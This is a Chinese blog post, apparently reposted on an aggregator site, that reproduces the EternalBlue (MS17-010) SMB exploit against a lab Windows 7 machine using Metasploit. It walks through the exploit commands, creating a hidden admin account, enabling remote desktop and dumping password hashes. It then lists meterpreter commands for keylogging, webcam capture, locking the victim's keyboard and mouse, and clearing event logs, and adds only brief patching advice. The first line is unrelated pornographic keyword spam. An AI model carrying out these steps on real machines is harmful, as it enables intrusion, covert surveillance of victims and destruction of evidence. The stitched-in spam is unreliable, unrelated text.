国产 无码 综合区,色欲AV无码国产永久播放,无码天堂亚洲国产AV,国产日韩欧美女同一区二区

永恒之藍(lán)(ms17-010)簡(jiǎn)介與復(fù)現(xiàn)

這篇具有很好參考價(jià)值的文章主要介紹了永恒之藍(lán)(ms17-010)簡(jiǎn)介與復(fù)現(xiàn)。希望對(duì)大家有所幫助。如果存在錯(cuò)誤或未考慮完全的地方,請(qǐng)大家不吝賜教,您也可以點(diǎn)擊"舉報(bào)違法"按鈕提交疑問。

一、永恒之藍(lán)的介紹

永恒之藍(lán)是指2017年4月14日晚,黑客團(tuán)體Shadow Brokers(影子經(jīng)紀(jì)人)公布一大批網(wǎng)絡(luò)攻擊工具,其中包含“永恒之藍(lán)”工具,“永恒之藍(lán)”利用Windows系統(tǒng)的SMB漏洞可以獲取系統(tǒng)最高權(quán)限。5月12日,不法分子通過改造“永恒之藍(lán)”制作了wannacry勒索病毒,英國(guó)、俄羅斯、整個(gè)歐洲以及中國(guó)國(guó)內(nèi)多個(gè)高校校內(nèi)網(wǎng)、大型企業(yè)內(nèi)網(wǎng)和政府機(jī)構(gòu)專網(wǎng)中招,被勒索支付高額贖金才能解密恢復(fù)文件。

二、漏洞描述

惡意代碼會(huì)掃描開放445文件共享端口的Windows機(jī)器,無需用戶任何操作,只要開機(jī)上網(wǎng),不法分子就能在電腦和服務(wù)器中植入勒索軟件、遠(yuǎn)程控制木馬、虛擬貨幣挖礦機(jī)等惡意程序。

本次黑客使用的是Petya勒索病毒的變種Petwarp,攻擊時(shí)仍然使用了永恒之藍(lán)勒索漏洞,并會(huì)獲取系統(tǒng)用戶名與密碼進(jìn)行內(nèi)網(wǎng)傳播。

本次爆發(fā)使用了已知OFFICE漏洞、永恒之藍(lán)SMB漏洞、局域網(wǎng)感染等網(wǎng)絡(luò)自我復(fù)制技術(shù),使得病毒可以在短時(shí)間內(nèi)呈爆發(fā)態(tài)勢(shì)。同時(shí),該病毒與普通勒索病毒不同,其不會(huì)對(duì)電腦中的每個(gè)文件都進(jìn)行加密,而是通過加密硬盤驅(qū)動(dòng)器主文件表(MFT),使主引導(dǎo)記錄(MBR)不可操作,通過占用物理磁盤上的文件名,大小和位置的信息來限制對(duì)完整系統(tǒng)的訪問,從而讓電腦無法啟動(dòng),相較普通勒索病毒對(duì)系統(tǒng)更具破壞性。

三、MSF介紹

Metasploit Framework(MSF)是一款開源安全漏洞檢測(cè)工具,附帶數(shù)千個(gè)已知的軟件漏洞,并保持持續(xù)更新。Metasploit可以用來信息收集、漏洞探測(cè)、漏洞利用等滲透測(cè)試的全流程,被安全社區(qū)冠以“可以黑掉整個(gè)宇宙”之名。剛開始的Metasploit是采用Perl語言編寫的,但是再后來的新版中,改成了用Ruby語言編寫的了,此工具在kali中是自帶的。

四、漏洞復(fù)現(xiàn)

  1. 復(fù)現(xiàn)環(huán)境

win7(192.168.8.146)(實(shí)驗(yàn)前將防火墻徹底關(guān)閉

win10(192.168.8.8)后續(xù)攻擊使用

kali(192.168.8.145)

  1. 先使用nmap對(duì)目標(biāo)機(jī)進(jìn)行掃描,查看其445端口是否開啟

永恒之藍(lán)(ms17-010)簡(jiǎn)介與復(fù)現(xiàn)
  1. 在終端輸入msfconsole進(jìn)入MSF

永恒之藍(lán)(ms17-010)簡(jiǎn)介與復(fù)現(xiàn)
  1. 使用msf中的查找命令搜索關(guān)于永恒之藍(lán)的腳本:search ms17—010

其中:auxiliary為輔助模塊腳本;exploit為攻擊模塊腳本。

永恒之藍(lán)(ms17-010)簡(jiǎn)介與復(fù)現(xiàn)
  1. 使用ms17-010輔助模塊

  • 使用模塊 use 粘貼模塊

永恒之藍(lán)(ms17-010)簡(jiǎn)介與復(fù)現(xiàn)
  1. 配置ms17-010的輔助性腳本

  • 查看配置:show options

永恒之藍(lán)(ms17-010)簡(jiǎn)介與復(fù)現(xiàn)
  1. 配置目標(biāo)機(jī)IP地址:set RHOST +目標(biāo)機(jī)ip

永恒之藍(lán)(ms17-010)簡(jiǎn)介與復(fù)現(xiàn)
  1. 配置成功后,執(zhí)行ms17-010的輔助性腳本run #運(yùn)行模塊

永恒之藍(lán)(ms17-010)簡(jiǎn)介與復(fù)現(xiàn)
  1. 使用ms17-010攻擊模塊

  • 使用模塊 use 粘貼模塊

永恒之藍(lán)(ms17-010)簡(jiǎn)介與復(fù)現(xiàn)
  1. 查看配置項(xiàng)

  • 查看配置:show options

永恒之藍(lán)(ms17-010)簡(jiǎn)介與復(fù)現(xiàn)
  1. 設(shè)置被攻擊機(jī)的ip地址:set RHOST +目標(biāo)機(jī)ip

永恒之藍(lán)(ms17-010)簡(jiǎn)介與復(fù)現(xiàn)
  1. 運(yùn)行ms17-010攻擊模塊

永恒之藍(lán)(ms17-010)簡(jiǎn)介與復(fù)現(xiàn)
  1. 成功建立會(huì)話后,使用一些功能shell

永恒之藍(lán)(ms17-010)簡(jiǎn)介與復(fù)現(xiàn)
  • 在此處可對(duì)目標(biāo)機(jī)使用dos命令進(jìn)行操作

  • 使用exit可退出win7終端

  1. 入侵成功后

  • 開啟遠(yuǎn)程終端:需要雙終端操作

在shell中,新建一個(gè)用戶,將其加入管理員組

永恒之藍(lán)(ms17-010)簡(jiǎn)介與復(fù)現(xiàn)
永恒之藍(lán)(ms17-010)簡(jiǎn)介與復(fù)現(xiàn)
  • 在meterpreter下使用run getgui -e,試目標(biāo)機(jī)打開允許被遠(yuǎn)程連接

永恒之藍(lán)(ms17-010)簡(jiǎn)介與復(fù)現(xiàn)
永恒之藍(lán)(ms17-010)簡(jiǎn)介與復(fù)現(xiàn)
  • 用win10進(jìn)行遠(yuǎn)控

永恒之藍(lán)(ms17-010)簡(jiǎn)介與復(fù)現(xiàn)
永恒之藍(lán)(ms17-010)簡(jiǎn)介與復(fù)現(xiàn)
  • 在meterpreter下進(jìn)行進(jìn)一步實(shí)驗(yàn)

  • 查看靶機(jī)相關(guān)進(jìn)程信息:ps

永恒之藍(lán)(ms17-010)簡(jiǎn)介與復(fù)現(xiàn)
  • 查看靶機(jī)相關(guān)信息:sysinfo

永恒之藍(lán)(ms17-010)簡(jiǎn)介與復(fù)現(xiàn)
  • 截圖:screenshot

永恒之藍(lán)(ms17-010)簡(jiǎn)介與復(fù)現(xiàn)
  • 獲取靶機(jī)hash,破解密碼:hashdump

輸入hashdump

永恒之藍(lán)(ms17-010)簡(jiǎn)介與復(fù)現(xiàn)

尋找一個(gè)在線MD5解密網(wǎng)站進(jìn)行解密

永恒之藍(lán)(ms17-010)簡(jiǎn)介與復(fù)現(xiàn)
  • 還有很多其他的操作這里就不一一演示了

run scraper #查看目標(biāo)主機(jī)詳細(xì)信息

load kiwi ???#加載

pwd ?? #查看目標(biāo)當(dāng)前目錄(windows)

getlwd ? #查看目標(biāo)當(dāng)前目錄(Linux)

search -f *.jsp -d e:\ ?????? #搜索E盤中所有以.jsp為后綴的文件

download e:\test.txt /root #將目標(biāo)機(jī)的e:\test.txt文件下載到/root目錄下

upload /root/test.txt d:\test ? #將/root/test.txt上傳到目標(biāo)機(jī)的 d:\test\ 目錄下

getpid ???#查看當(dāng)前Meterpreter Shell的進(jìn)程

idletime ?#查看主機(jī)運(yùn)行時(shí)間

getuid ?? #查看獲取的當(dāng)前權(quán)限

screenshot #截圖

webcam_list #查看目標(biāo)主機(jī)的攝像頭

webcam_snap #拍照

webcam_stream ?????????????? #開視頻

execute 參數(shù) -f 可執(zhí)行文件 #執(zhí)行可執(zhí)行程序

run getgui -e ?????????#開啟遠(yuǎn)程桌面

keyscan_start ?????????#開啟鍵盤記錄功能

keyscan_dump ?????? #顯示捕捉到的鍵盤記錄信息

keyscan_stop ????????#停止鍵盤記錄功能

uictl disable keyboard ????#禁止目標(biāo)使用鍵盤

uictl enable keyboard ????#允許目標(biāo)使用鍵盤

uictl disable mouse ????? #禁止目標(biāo)使用鼠標(biāo)

uictl enable mouse ????#允許目標(biāo)使用鼠標(biāo)

clearev ???????????#清除日志

  • 修復(fù)方法

1.關(guān)閉bios服務(wù),或開啟防火墻,屏蔽服務(wù)端口

2.給系統(tǒng)打上永恒之藍(lán)的漏洞修復(fù)補(bǔ)丁文章來源地址http://www.zghlxwxcb.cn/news/detail-498923.html

到了這里,關(guān)于永恒之藍(lán)(ms17-010)簡(jiǎn)介與復(fù)現(xiàn)的文章就介紹完了。如果您還想了解更多內(nèi)容,請(qǐng)?jiān)谟疑辖撬阉鱐OY模板網(wǎng)以前的文章或繼續(xù)瀏覽下面的相關(guān)文章,希望大家以后多多支持TOY模板網(wǎng)!

本文來自互聯(lián)網(wǎng)用戶投稿,該文觀點(diǎn)僅代表作者本人,不代表本站立場(chǎng)。本站僅提供信息存儲(chǔ)空間服務(wù),不擁有所有權(quán),不承擔(dān)相關(guān)法律責(zé)任。如若轉(zhuǎn)載,請(qǐng)注明出處: 如若內(nèi)容造成侵權(quán)/違法違規(guī)/事實(shí)不符,請(qǐng)點(diǎn)擊違法舉報(bào)進(jìn)行投訴反饋,一經(jīng)查實(shí),立即刪除!

領(lǐng)支付寶紅包贊助服務(wù)器費(fèi)用

相關(guān)文章

  • 【ms17-010】永恒之藍(lán)漏洞復(fù)現(xiàn)

    【ms17-010】永恒之藍(lán)漏洞復(fù)現(xiàn)

    準(zhǔn)備工作 攻擊機(jī):kali,ip:192.168.56.128 靶機(jī):windows server 2003,ip:192.168.56.132 工具:nmap(掃描)、msf 漏洞利用 首先我們先在攻擊機(jī)上使用nmap掃一下該網(wǎng)段主機(jī)的存活情況 此時(shí)已經(jīng)掃描出來了,ip為: 192.168.56.132 的主機(jī)開啟,并且顯示了開放的端口號(hào)。 然后我們可以使用:

    2024年01月19日
    瀏覽(20)
  • 永恒之藍(lán)ms17_010漏洞復(fù)現(xiàn)

    永恒之藍(lán)ms17_010漏洞復(fù)現(xiàn)

    攻擊機(jī):Linux kali(IP:192.168.52.132) 靶機(jī):Windows 7(x64)(IP:192.168.52.130) 條件:靶機(jī)防火墻關(guān)閉,兩臺(tái)機(jī)子能夠相互ping通,靶機(jī)445端口開啟(永恒之藍(lán)漏洞就是通過惡意代碼掃描并攻擊開放445端口的 Windows 主機(jī)) ? 登錄 kali linux,用 nmap 探測(cè)本網(wǎng)段存活主機(jī) nmap 192.168.5

    2024年02月11日
    瀏覽(19)
  • 永恒之藍(lán)漏洞復(fù)現(xiàn)(ms17-010)

    永恒之藍(lán)漏洞復(fù)現(xiàn)(ms17-010)

    永恒之藍(lán)漏洞復(fù)現(xiàn)(ms17-010) 環(huán)境 信息收集 先掃描目標(biāo)靶機(jī)IP 進(jìn)入MSF查看是否存在永恒之藍(lán)的漏洞 攻擊 攻擊機(jī):kali 靶機(jī):Windows Server 2008 對(duì)ip進(jìn)行收集開放什么端口 先掃描目標(biāo)靶機(jī)IP 因?yàn)樵谕粋€(gè)內(nèi)網(wǎng)之中 所以可以使用arp-scan -l 進(jìn)行查詢 知道目標(biāo)靶機(jī)IP(192.168.162.146)來進(jìn)

    2024年03月25日
    瀏覽(21)
  • ms17-010(永恒之藍(lán)) 漏洞復(fù)現(xiàn)與處理

    ms17-010(永恒之藍(lán)) 漏洞復(fù)現(xiàn)與處理

    ms17_010 是一種操作系統(tǒng)漏洞,僅影響 Windows 系統(tǒng)中的 SMBv1 服務(wù)。這個(gè)漏洞是由于 SMBv1 內(nèi)核函數(shù)中的緩沖區(qū)溢出而導(dǎo)致的。攻擊者可以通過該漏洞控制目標(biāo)系統(tǒng),并執(zhí)行任意代碼。這個(gè)漏洞通過 445 文件共享端口進(jìn)行利用,一旦攻擊者成功利用該漏洞,就可以在目標(biāo)主機(jī)上植入

    2024年02月09日
    瀏覽(24)
  • 《MS17-010(永恒之藍(lán))—漏洞復(fù)現(xiàn)及防范》

    《MS17-010(永恒之藍(lán))—漏洞復(fù)現(xiàn)及防范》

    作者: susususuao 免責(zé)聲明:本文僅供學(xué)習(xí)研究,嚴(yán)禁從事非法活動(dòng),任何后果由使用者本人負(fù)責(zé)。 - 永恒之藍(lán) 永恒之藍(lán)(Eternal Blue)是一種利用Windows系統(tǒng)的SMB協(xié)議漏洞來獲取系統(tǒng)的最高權(quán)限,以此來控制被入侵的計(jì)算機(jī)。而SMB服務(wù)是一個(gè)協(xié)議名,它能被用于Web連接和客戶端與服

    2024年02月06日
    瀏覽(29)
  • MS17-010(永恒之藍(lán))漏洞分析與復(fù)現(xiàn)

    MS17-010(永恒之藍(lán))漏洞分析與復(fù)現(xiàn)

    一、漏洞簡(jiǎn)介 1、永恒之藍(lán)介紹: 永恒之藍(lán)漏洞(MS17-010),它的爆發(fā)源于 WannaCry 勒索病毒的誕生,該病毒是不法分子利用NSA(National Security Agency,美國(guó)國(guó)家安全局)泄露的漏洞 “EternalBlue”(永恒之藍(lán))進(jìn)行改造而成 。勒索病毒的肆虐,儼然是一場(chǎng)全球性互聯(lián)網(wǎng)災(zāi)難,給廣

    2024年02月02日
    瀏覽(22)
  • 永恒之藍(lán)漏洞復(fù)現(xiàn)(ms17-010)----保姆級(jí)教程

    永恒之藍(lán)漏洞復(fù)現(xiàn)(ms17-010)----保姆級(jí)教程

    攻擊機(jī): kali Linux?????????? ? 靶機(jī): win7 x64??? 提示:? 復(fù)現(xiàn)攻擊前請(qǐng)關(guān)閉殺毒軟件 ? 1.復(fù)現(xiàn)第一步按以下操作打開 445端口: 在 \\\"運(yùn)行\(zhòng)\\" 里輸入: regedit 打開注冊(cè)表編輯器????????????????????????????????????????????????????????????????????

    2023年04月08日
    瀏覽(21)
  • 利用kali Linux復(fù)現(xiàn)永恒之藍(lán)(MS17-010)漏洞

    利用kali Linux復(fù)現(xiàn)永恒之藍(lán)(MS17-010)漏洞

    目錄 什么是永恒之藍(lán)? 永恒之藍(lán)漏洞原理 實(shí)驗(yàn)環(huán)境 操作前提 實(shí)驗(yàn)步驟 (1)復(fù)現(xiàn)成功后,執(zhí)行截圖命令 (2)對(duì)受害機(jī)器建立用戶,并且開啟受害機(jī)器的遠(yuǎn)程桌面并連接 永恒之藍(lán)是指2017年4月14日晚,黑客團(tuán)體Shadow Brokers(影子經(jīng)紀(jì)人)公布一大批網(wǎng)絡(luò)攻擊工具,其中包含“永恒

    2024年02月12日
    瀏覽(23)
  • MS17-010永恒之藍(lán)漏洞復(fù)現(xiàn)(手把手教程,超細(xì)!)

    MS17-010永恒之藍(lán)漏洞復(fù)現(xiàn)(手把手教程,超細(xì)!)

    0x00-聲明:小白一枚,寫下來為了記錄和學(xué)習(xí)交流,大神不喜勿噴。 0x01-思路:網(wǎng)段掃描—獲取IP—漏洞掃描—發(fā)現(xiàn)存在漏洞—攻擊拿shell—提權(quán) 目錄 一、環(huán)境搭建 ????????????????01 所需軟件:? 二、開始操作 ?01 kali 開始網(wǎng)段掃描 02 漏洞利用 03 提權(quán) 04 利用管理員用

    2023年04月09日
    瀏覽(21)
  • 主機(jī)漏洞利用演示MS17-010(永恒之藍(lán))

    主機(jī)漏洞利用演示MS17-010(永恒之藍(lán))

    ms17-010危害:對(duì)被攻擊方的電腦造成藍(lán)屏! 申明:本篇文章的用意僅做學(xué)習(xí)使用 網(wǎng)絡(luò)搭建環(huán)境: 軟件:Vmware Workstation 17 攻擊機(jī):Kali 靶機(jī)環(huán)境:Windows 7 Nmap軟件的基本功能: 1、主機(jī)發(fā)現(xiàn)(Host Discovery) 2、端口掃描(Port Scanning) 3、版本偵測(cè)(Version Detection) 4、操作系統(tǒng)偵

    2024年02月15日
    瀏覽(27)

覺得文章有用就打賞一下文章作者

支付寶掃一掃打賞

博客贊助

微信掃一掃打賞

請(qǐng)作者喝杯咖啡吧~博客贊助

支付寶掃一掃領(lǐng)取紅包,優(yōu)惠每天領(lǐng)

二維碼1

領(lǐng)取紅包

二維碼2

領(lǐng)紅包